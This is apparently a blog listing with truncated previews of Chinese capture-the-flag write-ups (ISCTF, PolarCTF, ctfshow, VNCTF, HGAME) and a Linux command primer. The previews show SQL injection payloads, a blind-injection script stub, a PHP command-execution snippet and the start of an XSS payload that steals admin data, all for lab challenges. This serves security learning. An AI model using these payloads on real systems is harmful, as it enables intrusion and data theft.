ISCTF-WP
20231z_Ssql(sql注入)username=1' or 1=1# //illegal words!username=1'# //用户名或密码错误username=-1' or 1 order by 3# //回显You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=,但是没用,说明等号被过滤了username=-1' or 1 order by 4# //用户名或密码错误username=-1' union select 1,2,3# //illegal words!username=union //illegal words!,尝试后双写和大写都不能绕过username=select //用户名或密码错误尝试布尔盲注username=0' or if(substr(database(),1,1)=c,true,false) ...
Polarctf靶场
简单swp(php特性)扫目录就能找到/.index.php.swp,访问得到源码 function jiuzhe($xdmtql){ return preg_match('/sys.*nb/is', $xdmtql);}$xdmtql = @$_POST['xdmtql'];if (!is_array($xdmtql)) { if (!jiuzhe($xdmtql)) { if (strpos($xdmtql, 'sys nb') !== false) { echo 'flag{*******}'; } else { echo 'true .swp file?'; } } else { echo...
Polarctf-wp
2025春季挑战赛WEBcoke的登陆在提示页面注意到提示cookie,查看cookie值为coke-lishuai,并且注释给出账号是coke 在登录时直接用username=coke,password=coke-lishuai登录 获得flag{ji_xing_duizhang} bllbl_rce随便输几个命令均回显no,扫目录发现/admin/admin.php下有东西,访问可下载备份文件,源码如下 <?phpif (isset($_POST['command'])) { $command = $_POST['command']; if (strpos($command, 'bllbl') === false) { die("no"); } echo "<pre>"; system ($command); echo...
ctfshow-萌新-web
知识点在之前都学到了,现在就只是做题和补充 web1(php特性)<?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id = $id order by id limit 1 "; echo "执行的sql为:$sql<br>"; # 执行sql 语句 ...
ctfshow-web
web签到题(源码泄露)源码泄露,注释base64解码 web2(sql注入)简单sql注入,post传参username和password password=1&username=1' or 1=1# //回显欢迎你,ctfshowpassword=1&username=-1' or 1=1 order by 4# //无回显password=1&username=-1' or 1=1 order by 3# //回显欢迎你,ctfshowpassword=1&username=-1' union select 1,2,3# //回显2password=1&username=-1' union select 1,database(),3# //回显web2password=1&username=-1' union select 1,(select group_concat(table_name) from information_schema.tables...
linux基础
一.常见命令(含解释及补充) 1.ls:列出文件目录 选项 作用 示例 -a 列出所有文件(包括隐藏文件) ls -a -l 列出文件及属性,注意大部分操作系统以ll来代替ls -l ls -l -la 列出所有文件及属性(包括隐藏文件) ls -la -h 以易读单位显示文件大小(如 KB、MB,需与 -l 连用) ls -lh -t 按最后修改时间排序(最新文件在前) ls -lt -r 反向排序(配合 -t 或 -S 使用) ls -ltr -S 按文件大小排序(从大到小) ls -lS -R 递归列出子目录内容(显示目录树结构) ls -R --color 彩色输出(默认启用,不同文件类型颜色不同) ls --color=auto -i 显示文件的 inode 编号 ls -i -d 仅显示目录本身(不列出目录内容) ls -d */ / 显示根目录下文件 ls...
VNCTF-WP-WP
WEB奶龙回家在做的时候尝试了时间盲注,但是MySQL中的sleep和benchmark被ban了,后面尝试无果,看wp才知道是sqlite的时间盲注,先fuzz测试下waf 可知union,benchmark,sleep被过滤,但是实测空格和等号也被过滤了,用/**/代替空格,sqlite中的randomblob()来进行延时,最终脚本如下 import requestsimport timeurl = 'http://node.vnteam.cn:43292/login'flag = ''for i in range(1, 500): low = 32 high = 128 mid = (low + high) // 2 while low < high: time.sleep(0.2) # 构造注入payload payload =...
HGAME-WP
WEBPacman直接在源码中找通关逻辑,在index.js中就可以找到,但是有两个,之前找错了,一直交没对 拿出来base64+栅栏2栏就行 MysteryMessageBoard通过弱口令爆破登录shallot用户,密码888888,然后插入xss的payload后访问/admin <script>var xhr=new XMLHttpRequest();xhr.open("POST", "http://127.0.0.1:8888/", true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("comment=" +...
